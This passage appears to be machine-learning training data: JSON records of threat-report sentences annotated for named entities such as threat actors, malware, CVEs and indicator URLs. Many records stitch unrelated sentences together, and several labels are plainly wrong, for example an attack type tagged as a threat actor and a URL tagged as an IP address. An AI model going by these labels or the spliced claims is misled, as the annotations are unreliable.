We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": {"TOOL: PIVY": [[16, 20]], "VULNERABILITY: zero-day exploit": [[42, 58]], "MALWARE: Kazuar tool": [[230, 241]], "THREAT_ACTOR: Turla": [[263, 268]], "THREAT_ACTOR: Uroburos": [[304, 312]], "THREAT_ACTOR: Snake": [[317, 322]], "ORGANIZATION: embassies": [[370, 379]], "ORGANIZATION: defense contractors": [[382, 401]], "ORGANIZATION: educational institutions": [[404, 428]], "ORGANIZATION: research organizations": [[435, 457]]}, "info": {"id": "cyberner_stix_train_001809", "source": "cyberner_stix_train"}} {"text": "] net app store henbox_3 Figure 2 HenBox app installed , purporting to be DroidVPN Depending on the language setting on the device , and for this particular variant of HenBox , the installed HenBox app may have the name “ Backup ” but uses the same DroidVPN logo . The Winnti group’s Opsec was dismal to say the least . The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"MALWARE: HenBox": [[34, 40], [168, 174], [191, 197]], "THREAT_ACTOR: Winnti": [[269, 275]], "ORGANIZATION: financial": [[358, 367]], "ORGANIZATION: policy organizations": [[372, 392]], "TOOL: emails": [[432, 438]], "ORGANIZATION: audiences": [[481, 490]]}, "info": {"id": "cyberner_stix_train_001810", "source": "cyberner_stix_train"}} {"text": "It is extremely unlikely you or someone you know was affected by Chrysaor malware . Dragos has identified Leafminer group targeting access operations in the electric utility sector . Let’s look at how the malicious payload is embedded and then look into the details of the backdoor itself . 
On June 25 , 2022 , KillNet messaging suggested that Conti was ready to fight , that Lithuania was its new testing ground for DDoS attacks , and that its \" Zarya \" hackers were preparing for cyber operations .", "spans": {"MALWARE: Chrysaor": [[65, 73]], "ORGANIZATION: Dragos": [[84, 90]], "THREAT_ACTOR: Leafminer group": [[106, 121]], "ORGANIZATION: electric utility sector": [[157, 180]], "THREAT_ACTOR: DDoS attacks": [[417, 429]], "THREAT_ACTOR: Zarya": [[447, 452]]}, "info": {"id": "cyberner_stix_train_001811", "source": "cyberner_stix_train"}} {"text": "We also discovered and analyzed live , misconfigured malicious command and control servers ( C2 ) , from which we were able to identify how the attacker gets new , infected apps to secretly install and the types of activities they are monitoring . The Turla espionage group has been targeting various institutions for many years . The malware accomplishes this through querying the netsvc group value data located in the svchost group registry key which is HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost . Given Sandworm 's global threat activity and the worldwide deployment of MicroSCADA products , asset owners globally should take action to mitigate their tactics , techniques , and procedures against IT and OT systems .", "spans": {"TOOL: netsvc": [[382, 388]], "TOOL: svchost": [[421, 428]], "SYSTEM: HKLM\\SOFTWARE\\Microsoft\\Windows": [[457, 488]], "THREAT_ACTOR: Sandworm 's global threat activity": [[523, 557]], "SYSTEM: MicroSCADA": [[590, 600]], "ORGANIZATION: asset owners": [[612, 624]], "SYSTEM: IT and OT systems": [[717, 734]]}, "info": {"id": "cyberner_stix_train_001812", "source": "cyberner_stix_train"}} {"text": "] XXXX.ru/mms.apk ( where XXXX.ru represents the hosting provider ’ s domain ) , we named this malware family RuMMS . This volume chronicles two activity groups , code-named PROMETHIUM and NEODYMIUM , both of which target individuals in a specific area of Europe . 
The document leverages the common exploit aka template injection and tries to download a second stage from “ http://win-apu.ddns.net/apu.dot ” . In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware – a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": {"MALWARE: RuMMS": [[110, 115]], "THREAT_ACTOR: activity groups": [[145, 160]], "THREAT_ACTOR: PROMETHIUM": [[174, 184]], "THREAT_ACTOR: NEODYMIUM": [[189, 198]], "IP_ADDRESS: http://win-apu.ddns.net/apu.dot": [[374, 405]], "THREAT_ACTOR: threat actor": [[467, 479]], "THREAT_ACTOR: Winnti": [[489, 495]], "TOOL: GitHub": [[506, 512]], "MALWARE: malware": [[523, 530]], "THREAT_ACTOR: the group": [[562, 571]], "ORGANIZATION: gaming , pharmaceutical , and telecommunications companies": [[686, 744]]}, "info": {"id": "cyberner_stix_train_001813", "source": "cyberner_stix_train"}} {"text": "rootdaemon_i686 2019-01-08 04:55:00 b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 zygotedaemonarm 2019-01-08 04:55:00 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f zygotedaemonarm64 2019-01-08 04:55:00 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017 , when OilRig targeted a different Middle Eastern governmental organization . JhoneRAT : 273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f . 
Marlin is a notable split from OilRigs typical TTPs .", "spans": {"TOOL: BONDUPDATER": [[305, 316]], "TOOL: PowerShell-based Trojan": [[322, 345]], "ORGANIZATION: FireEye": [[366, 373]], "THREAT_ACTOR: OilRig": [[402, 408]], "ORGANIZATION: governmental organization": [[445, 470]], "MALWARE: JhoneRAT": [[473, 481]], "FILEPATH: 273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f": [[484, 548]], "MALWARE: Marlin": [[551, 557]], "THREAT_ACTOR: OilRigs": [[582, 589]]}, "info": {"id": "cyberner_stix_train_001814", "source": "cyberner_stix_train"}} {"text": "As the investigation progressed , Talos came to understand that this campaign was associated with the \" ChristinaMorrow '' text message spam scam previously spotted in Australia . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others . It’s also heavily obfuscated , but in a slightly different way than the backdoor . Commands to the remote system , and often the results of those commands , will be embedded within the protocol traffic between the client and server .", "spans": {"ORGANIZATION: Talos": [[34, 39]], "TOOL: PIVY": [[196, 200]], "VULNERABILITY: zero-day exploit": [[222, 238]]}, "info": {"id": "cyberner_stix_train_001815", "source": "cyberner_stix_train"}} {"text": "“ Using Twitter instead of command-and-control ( C & C ) servers is pretty innovative for an Android botnet. ” “ Using Twitter instead of command-and-control ( C & C ) servers is pretty innovative for an Android botnet , ” says Lukáš Štefanko , the ESET malware researcher who discovered the malicious app . In the first few months of their credential phishing ventures , Scattered Canary’s sights were mostly set on Asian targets—Malaysia and Japan , in particular . 
Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist .", "spans": {"SYSTEM: Twitter": [[8, 15]], "SYSTEM: Android": [[93, 100], [204, 211]], "ORGANIZATION: Twitter": [[119, 126]], "ORGANIZATION: ESET": [[249, 253]], "THREAT_ACTOR: Scattered Canary’s": [[372, 390]], "THREAT_ACTOR: Lazarus Group": [[568, 581]], "ORGANIZATION: bank": [[601, 605]]}, "info": {"id": "cyberner_stix_train_001816", "source": "cyberner_stix_train"}} {"text": "This gives the operators the capability to trick the user into accessing any site while stealing the user 's cookies or forging form fields , like account numbers or phone numbers . Stylistically , the observed tradecraft resembles activity from groups such as COBALT GYPSY (which is related to OilRig , Crambus , and APT34 and COBALT TRINITY also known as Elfin and APT33 . APT38 has pursued their main objective of targeting banks and financial entities since at least 2014 .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[261, 273]], "THREAT_ACTOR: OilRig": [[295, 301]], "THREAT_ACTOR: Crambus": [[304, 311]], "THREAT_ACTOR: APT34": [[318, 323]], "THREAT_ACTOR: COBALT TRINITY": [[328, 342]], "THREAT_ACTOR: Elfin": [[357, 362]], "THREAT_ACTOR: APT33": [[367, 372]], "THREAT_ACTOR: APT38": [[375, 380]], "ORGANIZATION: banks": [[427, 432]], "ORGANIZATION: financial entities": [[437, 455]]}, "info": {"id": "cyberner_stix_train_001817", "source": "cyberner_stix_train"}} {"text": "The campaign seeks to deliver Anubis , a particularly nasty piece of malware that was originally used for cyber espionage and retooled as a banking trojan . Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder . During 2018 , Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak S-APT/CobaltGoblin cybercrime groups . 
Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user ’s email address and password ) .", "spans": {"MALWARE: Anubis": [[30, 36]], "ORGANIZATION: Iranians": [[224, 232]], "ORGANIZATION: Europol": [[340, 347]], "ORGANIZATION: DoJ": [[352, 355]], "THREAT_ACTOR: FIN7": [[398, 402]], "THREAT_ACTOR: Carbanak S-APT/CobaltGoblin": [[407, 434]]}, "info": {"id": "cyberner_stix_train_001818", "source": "cyberner_stix_train"}} {"text": "Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences .", "spans": {"MALWARE: CARBANAK": [[80, 88]], "ORGANIZATION: audiences": [[386, 395]]}, "info": {"id": "cyberner_stix_train_001819", "source": "cyberner_stix_train"}} {"text": "No other significant changes were observed in the Trojan ’ s network behavior . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . 
Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others .", "spans": {"MALWARE: malicious Word documents": [[101, 125]], "VULNERABILITY: Windows OLE Automation Array Remote Code Execution Vulnerability": [[154, 218]], "VULNERABILITY: CVE-2014-6332": [[230, 243]], "MALWARE: WannaCry": [[288, 296]], "MALWARE: WCry": [[303, 307]], "MALWARE: WanaCrypt0r": [[315, 326]], "ORGANIZATION: telecommunications": [[504, 522]], "ORGANIZATION: shipping": [[525, 533]], "ORGANIZATION: car manufacturers": [[536, 553]], "ORGANIZATION: universities": [[556, 568]], "ORGANIZATION: health care industries": [[573, 595]]}, "info": {"id": "cyberner_stix_train_001820", "source": "cyberner_stix_train"}} {"text": "Our private reports subscription customers receive a steady stream of YARA , IOC , and reports on Sofacy , our most reported APT for the year .", "spans": {"TOOL: YARA": [[70, 74]], "TOOL: IOC": [[77, 80]], "THREAT_ACTOR: Sofacy": [[98, 104]]}, "info": {"id": "cyberner_stix_train_001821", "source": "cyberner_stix_train"}} {"text": "All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection . Using a U.S. based C2 infrastructure to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense .", "spans": {"TOOL: C2": [[215, 217]], "THREAT_ACTOR: TG-3390": [[273, 280]]}, "info": {"id": "cyberner_stix_train_001822", "source": "cyberner_stix_train"}} {"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . 
Webinjects targeting Japan , a country we haven’t seen targeted by Panda Banker before .", "spans": {"MALWARE: Microsoft Word documents": [[64, 88]], "VULNERABILITY: CVE-2017-0199": [[100, 113]], "MALWARE: Panda Banker": [[183, 195]]}, "info": {"id": "cyberner_stix_train_001823", "source": "cyberner_stix_train"}} {"text": "This stealth technique has been gaining popularity among adware-related threats distributed via Google Play . We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . This investigation shows that the author has evolved technically (by implementing new features) and in the quality of the decoy documents .", "spans": {"SYSTEM: Google Play": [[96, 107]], "THREAT_ACTOR: groups": [[138, 144]], "ORGANIZATION: government": [[193, 203]], "ORGANIZATION: electric": [[217, 225]]}, "info": {"id": "cyberner_stix_train_001824", "source": "cyberner_stix_train"}} {"text": "However , the app does create a WebView and registers a JavaScript interface to this class . Once inside a network , APT40 uses credential-harvesting tools to gain usernames and passwords , allowing it to expand its reach across the network and move laterally through an environment as it moves towards the ultimate goal of stealing data . Unloads ZxShell and deletes all of the active components . The first , CVE-2022 - 41123 , has been revealed by ZDI to be DLL hijacking due to the loading of a non - existent component by a privileged executed command .", "spans": {"THREAT_ACTOR: APT40": [[117, 122]], "TOOL: credential-harvesting tools": [[128, 155]], "MALWARE: ZxShell": [[348, 355]], "VULNERABILITY: CVE-2022 - 41123": [[411, 427]], "ORGANIZATION: ZDI": [[451, 454]]}, "info": {"id": "cyberner_stix_train_001825", "source": "cyberner_stix_train"}} {"text": "If the device gets locked , the malware can ’ t unlock it . 
The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 . This Malware Analysis Report ( MAR ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) .", "spans": {"THREAT_ACTOR: TA505": [[170, 175]], "ORGANIZATION: high profile companies": [[291, 313]], "ORGANIZATION: Department of Homeland Security": [[419, 450]], "ORGANIZATION: DHS": [[453, 456]], "ORGANIZATION: Federal Bureau of Investigation": [[467, 498]], "ORGANIZATION: FBI": [[501, 504]]}, "info": {"id": "cyberner_stix_train_001826", "source": "cyberner_stix_train"}} {"text": "In October 2015 , we observed several campaigns in which TA505 targeted Japanese and UK organizations with the Shifu banking Trojan .", "spans": {"THREAT_ACTOR: TA505": [[57, 62]], "MALWARE: Shifu": [[111, 116]], "MALWARE: Trojan": [[125, 131]]}, "info": {"id": "cyberner_stix_train_001827", "source": "cyberner_stix_train"}} {"text": "Our Threat Intelligence and Interdiction team found the Gustuff malware being advertised in the Exploit.in forum as a botnet for rent . For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators . This makes it an extremely attractive target for APT groups that might want to take advantage of their userbase . 
Organizations must do better to safeguard their sensitive data and combat the growing ransomware threats by leveraging key prevention , detection and response components .", "spans": {"MALWARE: Gustuff": [[56, 63]], "THREAT_ACTOR: threat actor": [[235, 247]]}, "info": {"id": "cyberner_stix_train_001828", "source": "cyberner_stix_train"}} {"text": "Last year , OurMine victimized Marvel , The New York Times , and even the heads of some of the biggest technology companies in the world . In two months , the group returned to their proven method and withdrew funds again through ATMs .", "spans": {"THREAT_ACTOR: OurMine": [[12, 19]], "ORGANIZATION: The New York Times": [[40, 58]], "ORGANIZATION: technology companies": [[103, 123]]}, "info": {"id": "cyberner_stix_train_001829", "source": "cyberner_stix_train"}} {"text": "The author ( s ) of this malware wrote separate subroutines that identify the operating system version and fire off methods to obtain a list of currently running applications known to work on that particular version of Android . In November 2017 , Talos observed the latest Group123 campaign of the year , which included a new version of ROKRAT being used in the latest wave of attacks . opaque predicates were applied to Turla mosquito and APT10 ANEL . 
In each case , CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022 - 41040 for initial access .", "spans": {"SYSTEM: Android": [[219, 226]], "ORGANIZATION: Talos": [[248, 253]], "TOOL: ROKRAT": [[338, 344]], "THREAT_ACTOR: Turla": [[422, 427]], "MALWARE: mosquito": [[428, 436]], "THREAT_ACTOR: APT10": [[441, 446]], "MALWARE: ANEL": [[447, 451]], "ORGANIZATION: CrowdStrike": [[469, 480]], "VULNERABILITY: CVE-2022 - 41040": [[564, 580]]}, "info": {"id": "cyberner_stix_train_001830", "source": "cyberner_stix_train"}} {"text": "While Canada-targeted threats are not new , Emotet in particular , with its frequent region-specific email campaigns , is bringing new attention to geo-targeting in Canada and beyond . The Word document usually exploits CVE-2012-0158 .", "spans": {"TOOL: Emotet": [[44, 50]], "TOOL: Word": [[189, 193]], "VULNERABILITY: CVE-2012-0158": [[220, 233]]}, "info": {"id": "cyberner_stix_train_001831", "source": "cyberner_stix_train"}} {"text": "A closer review of the file names revealed “ IT Worx ” and “ MCI ” .", "spans": {"ORGANIZATION: IT Worx": [[45, 52]], "ORGANIZATION: MCI": [[61, 64]]}, "info": {"id": "cyberner_stix_train_001832", "source": "cyberner_stix_train"}} {"text": "The first one executes a PowerShell script served from http://139.59.46.154:3485/eiloShaegae1 .", "spans": {"MALWARE: The first one": [[0, 13]], "TOOL: PowerShell": [[25, 35]], "URL: http://139.59.46.154:3485/eiloShaegae1": [[55, 93]]}, "info": {"id": "cyberner_stix_train_001833", "source": "cyberner_stix_train"}} {"text": "The value of the first item , whose key is “ method ” ( line 7 ) , indicates the type of the contents : install , info and sms . While researching the OilRig campaign , we have seen two waves of targeted attacks on Saudi Arabian organizations in which a group of threat actors delivered the Helminth Trojan as a payload . Gamaredon : http://win-apu.ddns.net/apu.dot/ . 
None Follow Microsoft recommendations to disable remote PowerShell for non - administrative users where possible .", "spans": {"THREAT_ACTOR: group": [[254, 259]], "THREAT_ACTOR: threat actors": [[263, 276]], "THREAT_ACTOR: Gamaredon": [[322, 331]], "URL: http://win-apu.ddns.net/apu.dot/": [[334, 366]]}, "info": {"id": "cyberner_stix_train_001834", "source": "cyberner_stix_train"}} {"text": "As a rule , bots self-proliferate by sending out text messages with a malicious link to addresses in the victim ’ s address book . the targeted system with a piece of malware called HyperBro , a Remote Access Trojan ( RAT ) . When the malicious DLL is loaded at hpqhvind.exe startup , its DLLMain function is called that will check its parent process for the following sequence of bytes at offset 0x10BA . It crafts configurable IEC-104 ASDU messages , to change the state of RTU IOAs to ON or OFF .", "spans": {"TOOL: HyperBro": [[182, 190]], "TOOL: Remote Access Trojan": [[195, 215]], "TOOL: RAT": [[218, 221]], "TOOL: DLL": [[245, 248]], "FILEPATH: hpqhvind.exe": [[262, 274]]}, "info": {"id": "cyberner_stix_train_001835", "source": "cyberner_stix_train"}} {"text": "In addition to the value of the intelligence , the threat actors could also exploit this access for other malicious activity , such as generating spearphishing emails from internal email addresses to compromise the organizations' networks with malware .", "spans": {"TOOL: emails": [[160, 166]], "TOOL: email": [[181, 186]]}, "info": {"id": "cyberner_stix_train_001836", "source": "cyberner_stix_train"}} {"text": "throughout the Android package . The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists . Although these points do not definitively tie WATERSPOUT to APT12 , they do indicate a possible connection between the WATERSPOUT campaign , the THREEBYTE campaign , and the HIGHTIDE campaign attributed to APT12 . 
While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": {"SYSTEM: Android": [[15, 22]], "MALWARE: WATERSPOUT": [[175, 185], [248, 258]], "THREAT_ACTOR: APT12": [[189, 194], [335, 340]], "MALWARE: THREEBYTE": [[274, 283]], "MALWARE: HIGHTIDE": [[303, 311]]}, "info": {"id": "cyberner_stix_train_001837", "source": "cyberner_stix_train"}} {"text": "The loader will then create the batch file %LOCALAPPDATA%\\cdnver.bat , which it will write the following :", "spans": {"FILEPATH: %LOCALAPPDATA%\\cdnver.bat": [[43, 68]]}, "info": {"id": "cyberner_stix_train_001838", "source": "cyberner_stix_train"}} {"text": "The app checks if the device ’ s network matches one of those provided by the server . BARIUM , a Chinese state player that also goes by APT17 , Axiom and Deputy Dog , was previously linked to the ShadowPad and CCleaner incidents , which were also supply-chain attacks that used software updates to sneak onto machines . This handle value is invalid : all the windows kernel handle values are by design a multiple of 4 . 
It has an interesting way of loading the malicious JavaScript we had not seen before either .", "spans": {"THREAT_ACTOR: BARIUM": [[87, 93]], "THREAT_ACTOR: APT17": [[137, 142]], "THREAT_ACTOR: Axiom": [[145, 150]], "THREAT_ACTOR: Deputy": [[155, 161]], "THREAT_ACTOR: Dog": [[162, 165]], "TOOL: ShadowPad": [[197, 206]], "TOOL: CCleaner": [[211, 219]], "TOOL: software updates": [[279, 295]], "SYSTEM: windows": [[360, 367]]}, "info": {"id": "cyberner_stix_train_001839", "source": "cyberner_stix_train"}} {"text": "Based on a bashtemp directory of the latest sample we found , there are other compiled ELF scripts , named init and init2 , that loops the kit to keep running :", "spans": {"TOOL: ELF": [[87, 90]]}, "info": {"id": "cyberner_stix_train_001840", "source": "cyberner_stix_train"}} {"text": "While some of these acquisition are performed purely through code in mike.jar , some others that require access to , for example , SQLite databases or other files in the application 's storage are performed through rootdaemon instead , which should be running with root privileges . In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network . The document lowers the victim ’s suspicions by distracting them with a real document while the dropper installs the backdoor . This file contains the ransom note .", "spans": {"ORGANIZATION: Kaspersky Lab": [[303, 316]], "MALWARE: anomalous network traffic": [[361, 386]], "ORGANIZATION: government organization": [[392, 415]], "MALWARE: backdoor": [[543, 551]]}, "info": {"id": "cyberner_stix_train_001841", "source": "cyberner_stix_train"}} {"text": "Evolution The initial version of the malware dates back to early June 2019 , masquerading as a “ Google Play Verificator ” app . In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 . 
Due to overlapping TTPs , including similar custom tools , DragonOK is thought to have a direct or indirect relationship with the threat group Moafee .", "spans": {"SYSTEM: Google Play Verificator": [[97, 120]], "ORGANIZATION: Kaspersky": [[145, 154]], "THREAT_ACTOR: DragonOK": [[291, 299]], "THREAT_ACTOR: group Moafee": [[369, 381]]}, "info": {"id": "cyberner_stix_train_001842", "source": "cyberner_stix_train"}} {"text": "Hence , the time between the victim running the downloader and the operators ’ first commands is only a few minutes .", "spans": {}, "info": {"id": "cyberner_stix_train_001843", "source": "cyberner_stix_train"}} {"text": "To date , Whitefly has attacked organizations in the healthcare , media , telecommunications , and engineering sectors . In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group’s new APT attack using 0-day vulnerabilities CVE-2018-8174 in the wild .", "spans": {"THREAT_ACTOR: Whitefly": [[10, 18]], "ORGANIZATION: healthcare": [[53, 63]], "ORGANIZATION: media": [[66, 71]], "ORGANIZATION: telecommunications": [[74, 92]], "ORGANIZATION: engineering sectors": [[99, 118]], "ORGANIZATION: 360 Core Security": [[143, 160]], "THREAT_ACTOR: APT-C-06": [[193, 201]], "VULNERABILITY: 0-day": [[231, 236]], "VULNERABILITY: CVE-2018-8174": [[253, 266]]}, "info": {"id": "cyberner_stix_train_001844", "source": "cyberner_stix_train"}} {"text": "The txt message uses social engineering to dupe unsuspecting users into clicking on a link to a downloadable Android application . Should a user enable this content , the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim 's system . 
The code catches the “ hxe_prealloc ” The malware verifies that the server is authentic by downloading a signature file that is signed by the server and ensuring that it is the right one to make the operation more resilient to takedowns", "spans": {"SYSTEM: Android": [[109, 116]], "THREAT_ACTOR: attackers": [[171, 180]], "TOOL: DDE protocol": [[206, 218]], "MALWARE: malware": [[326, 333]]}, "info": {"id": "cyberner_stix_train_001845", "source": "cyberner_stix_train"}} {"text": "Still included in the last versions , this screen is only used to overlay the official Google Play Store app . This was followed by an initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints within two weeks of initial access . There is minimal public information regarding the Nameless Backdoor , except for the interesting report from Cyphort in 2015 .", "spans": {"SYSTEM: Google Play Store": [[87, 104]], "TOOL: Visma endpoints": [[221, 236]], "MALWARE: Nameless Backdoor": [[324, 341]], "ORGANIZATION: Cyphort": [[383, 390]]}, "info": {"id": "cyberner_stix_train_001846", "source": "cyberner_stix_train"}} {"text": "] com ) : Contains android packages , java archives and zip archives with exploits Archive Link domains : Three domains with the same functionality , but the application chooses one of them to send request for archive link . While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . 
After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals .", "spans": {"SYSTEM: android": [[19, 26]], "ORGANIZATION: Secureworks": [[264, 275]], "THREAT_ACTOR: BRONZE BUTLER": [[287, 300]], "VULNERABILITY: CVE-2016-7836": [[367, 380]], "MALWARE: Powermud": [[521, 529]], "MALWARE: Powemuddy": [[533, 542]], "THREAT_ACTOR: Seedworm": [[545, 553]], "TOOL: email": [[679, 684]]}, "info": {"id": "cyberner_stix_train_001847", "source": "cyberner_stix_train"}} {"text": "Unit 61486 is the 12th Bureau of the PLA 's 3rd General Staff Department ( GSD ) and is headquartered in Shanghai , China . The first Potao campaign that we examined took place in August 2011 .", "spans": {"THREAT_ACTOR: Unit 61486": [[0, 10]]}, "info": {"id": "cyberner_stix_train_001848", "source": "cyberner_stix_train"}} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Their arsenal includes network-driven backdoors , several generations of modular backdoors , harvesting tools , and wipers .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "ORGANIZATION: customers": [[187, 196]], "MALWARE: network-driven backdoors": [[222, 246]], "MALWARE: modular backdoors": [[272, 289]], "MALWARE: harvesting tools": [[292, 308]], "MALWARE: wipers": [[315, 321]]}, "info": {"id": "cyberner_stix_train_001849", "source": "cyberner_stix_train"}} {"text": "Third-party marketplaces or some other attacker-controlled domains are likely used to host the sample . Now , Silence is one of the most active threat actors targeting the financial sector . 
As with previous campaigns , and as highlighted in our annual M-Trends 2017 report , FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process .", "spans": {"THREAT_ACTOR: Silence": [[110, 117]], "ORGANIZATION: financial": [[172, 181]], "ORGANIZATION: M-Trends": [[253, 261]], "THREAT_ACTOR: FIN7": [[276, 280]]}, "info": {"id": "cyberner_stix_train_001850", "source": "cyberner_stix_train"}} {"text": "] 147 Red Alert 2.0 : Android Trojan targets security-seekers A malicious , counterfeit version of a VPN client for mobile devices targets security-minded victims with a RAT . North Korean defector and human rights-related targeting provides further evidence that APT37 conducts operations aligned with the interests of North Korea . Among all these random keys once the word “salamati” was also used, which means “health” in . It has legitimate uses but is widely used by attackers to help map a network .", "spans": {"MALWARE: Red Alert 2.0": [[6, 19]], "SYSTEM: Android": [[22, 29]], "SYSTEM: VPN": [[101, 104]], "THREAT_ACTOR: APT37": [[264, 269]]}, "info": {"id": "cyberner_stix_train_001851", "source": "cyberner_stix_train"}} {"text": "Conclusion Although the actor behind “ Agent Smith ” decided to make their illegally acquired profit by exploiting the use of ads , another actor could easily take a more intrusive and harmful route . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users . The emails are well written , with an abundance of detail . 
The report says the data was kept anonymous , but the companies could “ easily ” use the information to identify individuals or create targeted advertising for them .", "spans": {"MALWARE: Agent Smith": [[39, 50]], "VULNERABILITY: Nitris Exploit Kit": [[228, 246]], "VULNERABILITY: CottonCastle": [[268, 280]], "TOOL: emails": [[361, 367]]}, "info": {"id": "cyberner_stix_train_001852", "source": "cyberner_stix_train"}} {"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio .", "spans": {"MALWARE: GoogleUpdate.exe": [[4, 20]], "FILEPATH: Android version": [[97, 112]]}, "info": {"id": "cyberner_stix_train_001853", "source": "cyberner_stix_train"}} {"text": "Trend Micro published their analysis of the FakeM Trojan on January 17 , 2013 that discussed the original variant of FakeM . APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "TOOL: FakeM Trojan": [[44, 56]], "TOOL: FakeM": [[117, 122]], "THREAT_ACTOR: APT35": [[125, 130]], "ORGANIZATION: military": [[177, 185]], "ORGANIZATION: diplomatic": [[188, 198]], "ORGANIZATION: government personnel": [[203, 223]], "ORGANIZATION: organizations": [[226, 239]], "ORGANIZATION: media": [[247, 252]], "ORGANIZATION: energy": [[255, 261]], "ORGANIZATION: defense industrial base": [[266, 289]], "ORGANIZATION: DIB": [[292, 295]], "ORGANIZATION: engineering": [[304, 315]], "ORGANIZATION: business services": [[318, 335]], "ORGANIZATION: telecommunications sectors": [[340, 366]]}, "info": {"id": "cyberner_stix_train_001854", "source": "cyberner_stix_train"}} {"text": "Only 20 of the 213 short links have been clicked as of this 
publication .", "spans": {}, "info": {"id": "cyberner_stix_train_001855", "source": "cyberner_stix_train"}} {"text": "According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . Callisto Group appears to be intelligence gathering related to European foreign and security policy .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "THREAT_ACTOR: attackers": [[27, 36]], "VULNERABILITY: Microsoft Office vulnerabilities": [[104, 136]], "TOOL: LOWBALL": [[187, 194]]}, "info": {"id": "cyberner_stix_train_001857", "source": "cyberner_stix_train"}} {"text": "From a technical point of view , the sample is a unique spy implant with stand-out features such as device sensors listeners , including motion detectors that have been implemented with a degree of originality . McAfee Advanced Threat Research ( ATR ) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact . SniffPass ( SniffPass ) : Tool designed to steal passwords by sniffing network traffic . 
